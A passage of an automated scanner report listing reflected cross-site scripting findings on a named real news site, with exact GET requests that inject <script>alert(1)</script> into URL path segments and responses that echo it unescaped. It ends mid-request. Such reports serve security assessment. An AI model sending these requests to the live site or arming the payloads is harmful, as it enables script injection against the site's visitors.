User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig59948<script>alert(1)</script>50cd9c0218a/WebPortal/nypost/blocks/block_links/block_links.css</p>
...[SNIP]...

1.186. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dff08<script>alert(1)</script>577eb990e51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortaldff08<script>alert(1)</script>577eb990e51/nypost/blocks/block_links/block_links.css</p>
...[SNIP]...

1.187. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9da4<script>alert(1)</script>551afe08244 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostd9da4<script>alert(1)</script>551afe08244/blocks/block_links/block_links.css</p>
...[SNIP]...

1.188. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1d11b<script>alert(1)</script>5def719c2ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1d11b<script>alert(1)</script>5def719c2ac/block_links/block_links.css</p>
...[SNIP]...

1.189. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8933b<script>alert(1)</script>9d642fdaca7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/block_links8933b<script>alert(1)</script>9d642fdaca7/block_links.css</p>
...[SNIP]...

1.190. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b1b03<script>alert(1)</script>aa44ba2121a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.cssb1b03<script>alert(1)</script>aa44ba2121a</p>
...[SNIP]...

1.191. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5b4a<script>alert(1)</script>720f93d37d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfiga5b4a<script>alert(1)</script>720f93d37d0/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.192. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f621<script>alert(1)</script>e9834c5b54d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1f621<script>alert(1)</script>e9834c5b54d/nypost/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.193. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c85fd<script>alert(1)</script>b5f9d728c50 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostc85fd<script>alert(1)</script>b5f9d728c50/blocks/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.194. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73d80<script>alert(1)</script>f874c57cf69 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks73d80<script>alert(1)</script>f874c57cf69/breaking_news_bar/breaking_news_bar.css</p>
...[SNIP]...

1.195. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4f36a<script>alert(1)</script>d8e3415c99f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:16 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar4f36a<script>alert(1)</script>d8e3415c99f/breaking_news_bar.css</p>
...[SNIP]...

1.196. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d74f<script>alert(1)</script>4103bd751f4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 739
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:18 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.css6d74f<script>alert(1)</script>4103bd751f4</p>
...[SNIP]...

1.197. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88c89<script>alert(1)</script>690a4345437 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:39:55 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig88c89<script>alert(1)</script>690a4345437/WebPortal/nypost/blocks/btns/btns.css</p>
...[SNIP]...

1.198. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98f73<script>alert(1)</script>9a7b5d8e3b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal98f73<script>alert(1)</script>9a7b5d8e3b3/nypost/blocks/btns/btns.css</p>
...[SNIP]...

1.199. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce062<script>alert(1)</script>a6eac44dde was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostce062<script>alert(1)</script>a6eac44dde/blocks/btns/btns.css</p>
...[SNIP]...

1.200. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3920<script>alert(1)</script>d04ffc14596 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksa3920<script>alert(1)</script>d04ffc14596/btns/btns.css</p>
...[SNIP]...

1.201. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 26d00<script>alert(1)</script>aa71840f4bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/btns26d00<script>alert(1)</script>aa71840f4bd/btns.css</p>
...[SNIP]...

1.202. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 42583<script>alert(1)</script>da97e745c86 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 713
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/btns/btns.css42583<script>alert(1)</script>da97e745c86</p>
...[SNIP]...

1.203. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9270c<script>alert(1)</script>7f4bc085917 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig9270c<script>alert(1)</script>7f4bc085917/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
